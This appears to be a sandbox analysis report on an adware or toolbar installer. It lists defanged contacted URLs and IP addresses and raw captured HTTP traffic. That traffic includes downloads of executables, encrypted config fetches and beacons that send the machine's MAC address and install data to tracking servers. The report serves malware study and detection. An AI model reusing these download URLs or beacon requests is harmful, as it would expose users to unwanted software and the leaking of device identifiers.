| hxxp://wallba.com.m.01cdn.com/ImagesCache/335x335min/data/Image/2013hjw/3yue/7hao/chbz/19/20133795822390.jpg | |
| hxxp://d.union.kuping.cc/Public/Configs/Functon_version.xml | 222.186.60.27 |
| hxxp://hm.e.shifen.com/h.js?00d743cebf532de99c9b8d0cb34f0c40 | |
| hxxp://config.153624.com/Public/conf/open/1/1_4_3_2_2/10.jpg | 222.186.60.10 |
| hxxp://d.union.kuping.cc/Public/Configs/Liveindex.html?id=53390 | 222.186.60.27 |
| hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=913603030 | |
| hxxp://config.153624.com/Public/analysis/motionsendway.xml | 222.186.60.10 |
| hxxp://d.union.kuping.cc/Public/Configs/KpLiveControl/53390.xml | 222.186.60.27 |
| hxxp://hm.e.shifen.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1024x768&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=36732087&si=00d743cebf532de99c9b8d0cb34f0c40&st=1&v=1.0.59&lv=1&tt=cnzz统计 | |
| hxxp://config.153624.com/1.xml | 222.186.60.10 |
| hxxp://pcookie.split.cnzz.com/app.gif?&cna=CRgdDIoZnicCAbhrJiboztvu | |
| hxxp://tj.153624.com/behavior/ | 101.251.196.27 |
| hxxp://c.split.cnzz.com/stat.php?id=4833416&web_id=4833416 | |
| hxxp://config.153624.com/Public/conf/cpa/1/1_4_3_2_2/53390.xml | 222.186.60.10 |
| hxxp://c.split.cnzz.com/core.php?web_id=4833416&t=z | |
| hxxp://z9.cnzz.com/stat.htm?id=4833416&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=2021464923-1402350090-&showp=1024x768&st=0&sin=&t=undefinedundefined&rnd=1983988927 | |
| hxxp://cc00011.h.cnc.ccgslb.com.cn/1/scheme/53390.xml | |
| hxxp://d.union.kuping.cc/Public/Configs/KpInstall/AnImg.xml | 222.186.60.27 |
| hxxp://xnop014.tlgslb.com/Public/Upload/Soft/kptoolbar_b_8.exe | |
| hxxp://d.union.kuping.cc/Public/Configs/KpStartupControl/53390.xml | 222.186.60.27 |
| hxxp://config.153624.com/Public/conf/media/1/1_4_3_2_2/53390.xml | 222.186.60.10 |
| hxxp://config.153624.com/Public/conf/mini/1/1_4_3_2_2/53390.xml | 222.186.60.10 |
| hxxp://config.153624.com/Public/conf/homepage/1/1_4_3_2_2/53390.xml | 222.186.60.10 |
| hxxp://config.153624.com/Public/conf/icon/1/1_4_3_2_2/53390.xml | 222.186.60.10 |
| hxxp://config.153624.com/Public/conf/bz_pop_xml/1/1_4_3_2_2/53390.xml | 222.186.60.10 |
| hxxp://config.wallba.com/Public/Configs/KpInstall/AnImg.xml | 222.186.60.27 |
| hxxp://eiv.baidu.com/hmt/icon/21.gif | 115.239.211.92 |
| hxxp://img.wallba.com/Public/Configs/index.html?id=53390&class=silence | 222.186.60.7 |
| hxxp://hm.baidu.com/h.js?7e36c4d74dc16bfa27cd9aea154b5de5 | 61.135.185.140 |
| hxxp://pcookie.cnzz.com/app.gif?&cna=CRgdDIoZnicCAbhrJiboztvu | 42.120.219.171 |
| hxxp://config.wallba.com/Public/Configs/Functon_version.xml | 222.186.60.27 |
| hxxp://hm.baidu.com/h.js?00d743cebf532de99c9b8d0cb34f0c40 | 61.135.185.140 |
| hxxp://hzs21.cnzz.com/stat.htm?id=4833416&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=2021464923-1402350090-&showp=1024x768&st=0&sin=&t=undefinedundefined&rnd=1983988927 | 42.156.140.22 |
| hxxp://hzs6.cnzz.com/stat.htm?id=4793307&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=725810708-1402350084-&showp=1024x768&st=0&sin=&t=undefinedundefinedundefinedundefinedundefinedundefined&rnd=252340755 | 42.156.140.16 |
| hxxp://img.kuping.cc/Public/Upload/Soft/kptoolbar_b_8.exe | 122.226.163.83 |
| hxxp://img.wallba.com/ImagesCache/335x335min/data/Image/2013hjw/3yue/7hao/chbz/19/20133795822390.jpg | 222.186.60.7 |
| hxxp://s4.cnzz.com/stat.php?id=4793307&web_id=4793307 | 1.99.192.15 |
| hxxp://upgrade.kuping.cc/1/scheme/53390.xml | 103.224.232.40 |
| hxxp://c.cnzz.com/core.php?web_id=4833416&t=z | 42.120.219.6 |
| hxxp://config.wallba.com/Public/Configs/KpStartupControl/53390.xml | 222.186.60.27 |
| hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=913603030 | 42.120.219.171 |
| hxxp://config.wallba.com/Public/Configs/Liveindex.html?id=53390 | 222.186.60.27 |
| hxxp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1024x768&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=36732087&si=00d743cebf532de99c9b8d0cb34f0c40&st=1&v=1.0.59&lv=1&tt=cnzz统计 | 61.135.185.140 |
| hxxp://s21.cnzz.com/stat.php?id=4833416&web_id=4833416 | 1.99.192.16 |
| hxxp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1024x768&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=185766198&si=7e36c4d74dc16bfa27cd9aea154b5de5&st=1&v=1.0.59&lv=1 | 61.135.185.140 |
| hxxp://c.cnzz.com/core.php?web_id=4793307&t=z | 42.120.219.6 |
| hxxp://config.wallba.com/Public/Configs/KpLiveControl/53390.xml | 222.186.60.27 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Public/analysis/motionsendway.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:28 GMT
Content-Type: text/xml
Content-Length: 126
Last-Modified: Tue, 15 Apr 2014 02:37:17 GMT
Connection: keep-alive
ETag: "534c9b5d-7e"
Accept-Ranges: bytes
<?xml version="1.0" encoding="utf-8"?>..<root>..<data>...<send_time>0</send_time>...<send_way>1</send_way>..</data>..</root>....
GET /stat.htm?id=4833416&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=2021464923-1402350090-&showp=1024x768&st=0&sin=&t=undefinedundefined&rnd=1983988927 HTTP/1.1
Accept: */*
Referer: hXXp://config.wallba.com/Public/Configs/Liveindex.html?id=53390
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs21.cnzz.com
Connection: Keep-Alive
Cookie: cna=CRgdDIoZnicCAbhrJiboztvu
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Mon, 09 Jun 2014 21:41:31 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /Public/conf/mini/1/1_4_3_2_2/53390.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:47 GMT
Content-Type: text/xml
Content-Length: 1008
Last-Modified: Sat, 07 Jun 2014 04:25:05 GMT
Connection: keep-alive
ETag: "53929421-3f0"
Accept-Ranges: bytes
..._..O.K......&.......y.....{.".......g.........<..w .L.Sl.......\@b..)(7K9......Ha.ymL......[.. Z)E....M<.GFR........%.._w.r...E........H....C..`.....M.8/..%9"...<W.(..o.W..U.re.......w...{N.3k........Y\v.7I.z.C ........C.fJ.%.l?V?{~(~.$.Q...%H.8.......Q.i.....h@;.b.x.Au)a1;FM..q...`..t[..J2|'DKsNY|..`.d.:...4..Y.e.V......L..W......K..xe.}........(".eG...w(...I..#....$ ...oGpk..}4(..a..A..oO..%.*....S. .H..PR...l.?...gT...2w.`@..~...w.0'....x.d.f....@.Z..Cl..KY......C..Fr..^P.'..k>.._...VM...-.]...H"t:&5;^wa"...^.... ..5~.......Sb..?"....%.}.)\.wN..../O:.......wN..../..t~.uR.......4x........I..S.....Vtd?~..].O.m.."..h.\...V%.2d&...h.....A>......A..=^.{..w/"..FV.?[.}.%Q..f..;.i.f..;..!)y...;..T....g..\.@*.u.~.&D.O........-L.~...D...........4..]..r.8.0A..i7...!.M..........-g..?`.K.9....-.yF<..s.p..i(0........oCa..j:M..:}C:.J......h...Z..L}......;.[.n.T...].C.........e..H.F..a..oeSwN[..y..R.Y...L]........)6..nF.I..I.... l...d~.......ZW.}...C...W..%.....o.j1.s.UQ.t.....=..).N.....v....KP....k.....
GET /Public/tongji_baidu.html?ip=&mac=00-0C-29-64-A0-20&area=&channel_id=53390&install_way=1&soft_id=1&start_way=0&type=install&version=4.3.2.2 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: config.153624.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:23 GMT
Content-Type: text/html
Content-Length: 295
Last-Modified: Tue, 15 Apr 2014 02:37:16 GMT
Connection: keep-alive
ETag: "534c9b5c-127"
Accept-Ranges: bytes<script type="text/javascript">..var _bdhmProtocol = (("https:"
== document.location.protocol) ? " hXXps://" : " hXXp://");..document.
write(unescape("
GET /h.js?7e36c4d74dc16bfa27cd9aea154b5de5 HTTP/1.1
Accept: */*
Referer: hXXp://config.153624.com/Public/tongji_baidu.html?ip=&mac=00-0C-29-64-A0-20&area=&channel_id=53390&install_way=1&soft_id=1&start_way=0&type=install&version=4.3.2.2
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=AD4692A2C64DD9D0
HTTP/1.1 200 OK
Etag: 7a1a9509314f9578d26e288ff277b8cc
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Type: application/javascript
Connection: Keep-Alive
Content-Length: 5285
Date: Mon, 09 Jun 2014 21:41:24 GMT
Server: apache...............(function(){var c={id:"7e36c4d74dc16bfa27cd9aea154b5de5<<>>
",dm:["config.153624.com"],etrk:[],js:"tongji.baidu.com/hm-web/js/",ic
on:'/hmt/icon/21|gif|20|20',br:false,ctrk:false,align:-1,nv:-1,vdur:18
00000,age:31536000000,rec:0,rp:[],trust:0,vcard:0,..i{.F.{~...F...NB.R
...h.-..z..g%.maYru.......C......j...{f7..h....,3bz...4)..N...C..N.$(.
41.k.4..........~.x|5.NzN...::..Q.d|....7...jEX...i8b./..........|X"..
.2.....<..k..>..b....i..~opn9E....df.G......Yz...~.u...:........
lH`.......k2...[..&.B4.l&..`s*.Slf.....p....>....?;..Q.!...MT.s....
...@.rn.2..4JxH\u....!I..y...(.>J....Cu..r.2U......`....4.,........
.q...BJ.R1J-.P#J..%...I..O..S:"#2..4tb....=.gv.M.u3..f..o..Z..%..lb J.
-...M=.]&.$....q..4..Ng...|n.g,[.WfiY...v.sB../..4JLB...s=c..j).../...
..YfZ]rL..)......h.......w..EZf.....()A.n@.. MB....9...L....$H........
Yei."..9._o.7Y..Y...X.....4.g@.EE......{......L;.y..t`.5...< sfY;=j
WS~^S~......_.........!.......I....v<.n..L V.X....|39........R.....
...]......L..^r..{s^..|..{..5.u.1..{.5d..Im.....p#w.=5....{....#m...e.
(.....<...E.......uk.|./....w......>.U....1l_x...#40..;..$?.B.Xl
r.....[`..ZrS,!Z....H..A..I..i..8e]B.G .a.dQ2$.![..@...CV`.q...nl.N.p~
..2.C..[...w.`Yz..G.<(3N..8...H.Y^...6.d....h.,c..q:...mN.g..=<=
?{x$...R.A)koszny..#>.!P,M.....<..L...fE..~q...i....;..Z;X=.....
G.....)...R..%.Y..[..1./.D..,@S/......0........s'.r..O.$...Y.>.s...
.......9.@...T.......~z.f.0..2.,$..?q.j...r...y.e...d..q-.?..c%...B...
....?..4.*N..j]0}..B. .v..=..\ /....e.%..w.Z..N.J.....'p.i^$@...K&
GET /hm.gif?cc=1&ck=1&cl=32-bit&ds=1024x768&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=185766198&si=7e36c4d74dc16bfa27cd9aea154b5de5&st=1&v=1.0.59&lv=1 HTTP/1.1
Accept: */*
Referer: hXXp://config.153624.com/Public/tongji_baidu.html?ip=&mac=00-0C-29-64-A0-20&area=&channel_id=53390&install_way=1&soft_id=1&start_way=0&type=install&version=4.3.2.2
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=AD4692A2C64DD9D0
HTTP/1.1 200 OK
Cache-Control: private, max-age=0, no-cache
Pragma: no-cache
Content-Type: image/gif
X-Content-Type-Options: nosniff
Connection: Keep-Alive
Content-Length: 43
Date: Mon, 09 Jun 2014 21:41:25 GMT
Server: apacheGIF89a.............!.......,...........L..;....
GET /h.js?00d743cebf532de99c9b8d0cb34f0c40 HTTP/1.1
Accept: */*
Referer: hXXp://img.wallba.com/Public/Configs/index.html?id=53390&class=silence
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=AD4692A2C64DD9D0
HTTP/1.1 200 OK
Etag: 9b180d4d3387e2093696c20b42e6af01
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Type: application/javascript
Connection: Keep-Alive
Content-Length: 5282
Date: Mon, 09 Jun 2014 21:41:28 GMT
Server: apache...............(function(){var c={id:"00d743cebf532de99c9b8d0cb34f0c40<<>>
",dm:["img.wallba.com"],etrk:[],js:"tongji.baidu.com/hm-web/js/",icon:
'/hmt/icon/21|gif|20|20',br:false,ctrk:false,align:-1,nv:-1,vdur:18000
00,age:31536000000,rec:0,rp:[],trust:0,vcard:0,..i{.F.{~...F...NB.R...
h.-..z..g%.maYru.......C......j...{f7..h....,3bz...4)..N...C..N.$(.41.
k.4..........~.x|5.NzN...::..Q.d|....7...jEX...i8b./..........|X"...2.
....<..k..>..b....i..~opn9E....df.G......Yz...~.u...:........lH`
.......k2...[..&.B4.l&..`s*.Slf.....p....>....?;..Q.!...MT.s.......
@.rn.2..4JxH\u....!I..y...(.>J....Cu..r.2U......`....4.,.........q.
..BJ.R1J-.P#J..%...I..O..S:"#2..4tb....=.gv.M.u3..f..o..Z..%..lb J.-..
.M=.]&.$....q..4..Ng...|n.g,[.WfiY...v.sB../..4JLB...s=c..j).../.....Y
fZ]rL..)......h.......w..EZf.....()A.n@.. MB....9...L....$H........Yei
."..9._o.7Y..Y...X.....4.g@.EE......{......L;.y..t`.5...< sfY;=jWS~
^S~......_.........!.......I....v<.n..L V.X....|39........R........
]......L..^r..{s^..|..{..5.u.1..{.5d..Im.....p#w.=5....{....#m...e.(..
...<...E.......uk.|./....w......>.U....1l_x...#40..;..$?.B.Xlr..
...[`..ZrS,!Z....H..A..I..i..8e]B.G .a.dQ2$.![..@...CV`.q...nl.N.p~..2
.C..[...w.`Yz..G.<(3N..8...H.Y^...6.d....h.,c..q:...mN.g..=<=?{x
$...R.A)koszny..#>.!P,M.....<..L...fE..~q...i....;..Z;X=.....G..
...)...R..%.Y..[..1./.D..,@S/......0........s'.r..O.$...Y.>.s......
....9.@...T.......~z.f.0..2.,$..?q.j...r...y.e...d..q-.?..c%...B......
.?..4.*N..j]0}..B. .v..=..\ /....e.%..w.Z..N.J.....'p.i^$@...K>
GET /hm.gif?cc=1&ck=1&cl=32-bit&ds=1024x768&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=36732087&si=00d743cebf532de99c9b8d0cb34f0c40&st=1&v=1.0.59&lv=1&tt=cnzz统计 HTTP/1.1
Accept: */*
Referer: hXXp://img.wallba.com/Public/Configs/index.html?id=53390&class=silence
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=AD4692A2C64DD9D0
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Cache-Cont
rol: private, max-age=0, no-cache..Pragma: no-cache..Content-Type: ima
ge/gif..X-Content-Type-Options: nosniff..Connection: Keep-Alive..Conte
nt-Length: 43..Date: Mon, 09 Jun 2014 21:41:29 GMT..Server: apache....
GET /Public/conf/cpa/1/1_4_3_2_2/53390.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:30 GMT
Content-Type: text/xml
Content-Length: 1400
Last-Modified: Mon, 09 Jun 2014 10:05:28 GMT
Connection: keep-alive
ETag: "539586e8-578"
Accept-Ranges: bytes..._..O.K......&.......y.....{.".......g.........<..w .L.v...i].T.J<<>>
.@j..?,rN2^JVo.E...J.8....o..i.f..Zgk.o.Y....=)......j...,.G...D..`.n.
....WR.`h...,..;&.E...p.......... ..:c......,..n.46..*.mT0]k..........
..d>.ui5c.JX.`....i.....h@;.b.x.A.7A5...2.i.....h@;.b.x.Au)a1;FM..q
...`..t[..J2|'DKsNY|..`.d.:...4..Y.e.V......L..W......K..xe.}........(
".eG...w(...I..#....$ ...oGpk..}4(..a..A..oO..%.*....S. .H..PR...l.?..
.g........@..~...w.0'....x.d.f....@.Z..Cl...."....b....].c...2:^4..F.*
..G.y.V.RX.S...*%jNc2i....u.x.b.a......JX.....#..}..c.{..k../o|.?.....
....../o|.?....kD.B..O...C.J.R.=...k.sG1 ....=.9....k=.?)..y.w ......&
gt;.N..?.2..x....^0..Q...[.T.S..X..J..hG..)..t..............863.. ....
*.8..z.....>d.(.0....W...E..'..v.d.............v.d.....f71......!;.
..Tl-.2.......>F.8"_....i.2o1...u.....}.e.L.0o.n.9....]..{.. .V.#..
..Ic............. .V.#.V.......Jz.....#..$..........3m:.N.Q...w..$.g9&
gt;)@C.. .."4...1w}.8&.......Fk.._.#..@...J<... .HoU{..m...C.\]....
6............V.2.K.....c6...T9...C....eJ4"Kp.E.P.NG..W....q.........."
c..5l..>.f.....P.Q..@...y.3....P.Q.jDN8.FC.@..8..m%#.9K?j..%......c
1u.T8..0.P ...HA.g.......].=.1.pvq..J.cJG.v........Z......A..clI/.a...
..{..m...C.Z...%.*.'..o....LH......^X.5..B....T.}B... .E......T.}Bn..V
.h...:....z.i....&[.V....%.eEkL..J.......(.0.y>G.*Rg((2..a......8.U
y4i....KZE. %f..|..t...........1....c...a........}...L............f}..
.@0O..o.......Rw...i....OE...
GET /stat.htm?id=4793307&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=725810708-1402350084-&showp=1024x768&st=0&sin=&t=undefinedundefinedundefinedundefinedundefinedundefined&rnd=252340755 HTTP/1.1
Accept: */*
Referer: hXXp://img.wallba.com/Public/Configs/index.html?id=53390&class=silence
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs6.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Mon, 09 Jun 2014 21:41:28 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytesGIF89a.............!.......,...........D..;..
GET /Public/conf/c-lock/1/1_4_3_2_2/53390.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:20 GMT
Content-Type: text/xml
Content-Length: 1760
Last-Modified: Mon, 09 Jun 2014 02:30:09 GMT
Connection: keep-alive
ETag: "53951c31-6e0"
Accept-Ranges: bytes.h....N..KN ...M..n7.#...!..t[......7....Zh.....].W._..C.S."..V|..#..o<<>>
....R.R:..R...17.[..F..*>......JK...n7.#....)..vW....B....|.p....1J
..S"....].a..:7j[........R.R:..qE.0.J.|.....|.n.0 .%b.......H..~.{....
/......:^.K?.e.........`).r...c.....n4[9!V~....~...X{|y....W?.Cqr.Z...
.......p ..&S!.GB^W=...W...3.z....9:..p..m..Q'G...fBQNgY". ..F...."..v
.i....p. ..C|...|../1.k9..^......5n<.r...zh......0.9...J.y........e
. M.N.....c.....|F.V.f......F...."..v.i....p. ..C|...|../1.k9..^..X.b.
#.......gM.#.....Id...y.&...=...W.....A..(^...P5.:..5..(.<...l.q...
..i....Z...e.p.d...F.d.......{Wa..e.b.2....>.k.hA.Q..0..I.S.K.|...R
E...@...]......U..L.Jv:..n...gU.......^z..Z..... ..m...=...j.....9..0L
=...W...\..N..<.?.. ..o..-. ...[..n7.#......9B........U.r.Zn ...Z0.
Q68....lL(/qS.&..?OY..q....[..].....)....q*.uf ...:....`_..9Q./..C.E.~
....xE.l...L|w......e. .B|..................|.LF/.l6t?t...C.[..N;:CJ8.
_..,...i."0...m{0......b0..Z..76.~.......B...B.5$...%{..>2.I..#.y..
...e. %.....:.X.....x.%.....:..].|....~.{..../.y.g.2.,m.<.0.&!.....
.....f.....Q}. /!..HG..OYq....H...?dJTm...Ut..%..z...W?.Cqr.Rr...O....
.,.6.=g......F/.l6t?t...C.[......"v.0....k.r...R.R:..I...kI....W.C...0
!.V2.#.........M.|&..#?..W?.Cqr...h ..8.......x=...W...!s.......S.bq..
.w..2.9.l.o.a......n7.#...0.....M$Z.U...*.@Ei.I..M.!...#..P ...HA...l.
.s&.B.......<...T.".b......=...W.......4......2.u...D.NV'x[..&h...(
6....Hh[e..%...(..py.E..q0.......3=..n_l..W?.Cqr.H....:.@.Z..Cl...."..
..b....].c...2:^4..(8.6..D..U.0...C..&...n....,..I.....e. ..D ...I
GET /download/bdBrowserSetup-5810-ftn_1000039714.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: youqian.baidu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 09 Jun 2014 21:41:14 GMT
Content-Type: application/octet-stream
Content-Length: 34977744
Last-Modified: Thu, 10 Apr 2014 12:37:04 GMT
Connection: keep-alive
ETag: "53469070-215b7d0"
Accept-Ranges: bytesMZ......................@.............................................<<>>
..!..L.!This program cannot be run in DOS mode....$........V...7...7..
.7....I..7...OT..7...OD..7...7...6....}.:7....|..7....M..7....J..7..Ri
ch.7..........................PE..L......R......................0..N..
..............@...........................W.....sQ....@...............
................... 8......pQ.............x...X.....8..R..............
........................@...........T(8.<..........................
..text...G........................... ..`.rdata.......................
.......@..@.data.....-..@...B...,..............@....idata..6%... 8..&.
..n..............@....ndata... ...P8..........................rsrc....
....pQ.....................@..@.reloc...}...0W..~..................@..
B.....................................................................
......................................................................
......................................................................
......................................................a.........%...'.
........M...................9..........h...................*...f......
...,....g.....(......... ....k....(...9...................UR...p....{.
.............l.............................n....yd........_....J......
........[P...f....a....l.....&........-T.......................$.....
........uI...p....k....6G...!....lI........................?...~;.....
....N........z....u..............f....A.....t........2.....%....M...C.
...^e...Y....D...............Q...P.....M....J.............G.......
GET /1/scheme/53390.xml HTTP/1.1
Host: upgrade.kuping.cc
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 10:12:40 GMT
Content-Type: text/xml
Content-Length: 426
Last-Modified: Sat, 17 May 2014 02:16:02 GMT
ETag: "5376c662-1aa"
Accept-Ranges: bytes
Expires: Tue, 10 Jun 2014 10:12:40 GMT
Age: 41331
Powered-By-ChinaCache: HIT from 06010923SE<?xml version="1.0" encoding="utf-8"?>.<body>.<close>
;kp4_Mini.exe|kuping_v4.exe,6000|kp4_Mini.exe|DeskTopPop.exe|ExpandPac
kCheck.exe|Kp_BootClr.exe|Kp_BootClry.exe|KpInstallTheme.exe</close
>.<open>kuping_v4.exe,500*10|Repairer.exe</open>.<ht
tp>hXXp://file.kuping.cc/</http>.<area>..<name>ot
her</name>..<way>2</way>..<toversion>4.3.2.2&l
t;/toversion>..<url>hXXp://upgrade.kuping.cc/1/version_xml/4.
3.2.2.xml</url>.</area>.</body>...
GET /stat.php?id=4833416&web_id=4833416 HTTP/1.1
Accept: */*
Referer: hXXp://config.wallba.com/Public/Configs/Liveindex.html?id=53390
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s21.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Mon, 09 Jun 2014 21:41:30 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 09 Jun 2014 21:41:30 GMT
Expires: Mon, 09 Jun 2014 23:11:30 GMT1f7a..(function(){function l(){this.c="4833416";this.R="z";this.N="";t<<>>
his.K="";this.M="";this.o="1402350090";this.P="hzs21.cnzz.com";this.L=
"";this.s="CNZZDATA" this.c;this.r="_CNZZDbridge_" this.c;this.G="_cnz
z_CV" this.c;this.u="0";this.B={};this.a={};this.la()}function g(a,b){
try{var c=[];c.push("siteid=4833416");.c.push("name=" d(a.name));c.pus
h("msg=" d(a.message));c.push("r=" d(h.referrer));c.push("page=" d(f.l
ocation.href));c.push("agent=" d(f.navigator.userAgent));c.push("ex="
d(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).
src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(e){}}var h=docu
ment,f=window,d=encodeURIComponent,k=decodeURIComponent,p=unescape,r=e
scape,m="https:"===f.location.protocol?"https:":"http:",s=m "//c.cnzz.
com/core.php";l.prototype={la:function(){try{this.U(),.this.J(),this.i
a(),this.H(),this.m(),this.ga(),this.fa(),this.ja(),this.j(),this.ea()
,this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),f[this.r]
=f[this.r]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:funct
ion(){try{var a=this;f._czc={push:function(){return a.C.apply(a,argume
nts)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=f._czc;if("
[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){v
ar c=a[b];switch(c[0]){case "_setAccount":f._cz_account="[object Strin
g]"===.{}.toString.call(c[1])?c[1]:String(c[1]);break;case "_setAutoPa
geview":"boolean"===typeof c[1]&&(f._cz_autoPageview=c[1])}}}catch(e){
g(e,"cS failed")}},qa:function(){try{if("undefined"===typeof f._cz
GET /Public/conf/bz_pop_xml/1/1_4_3_2_2/53390.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
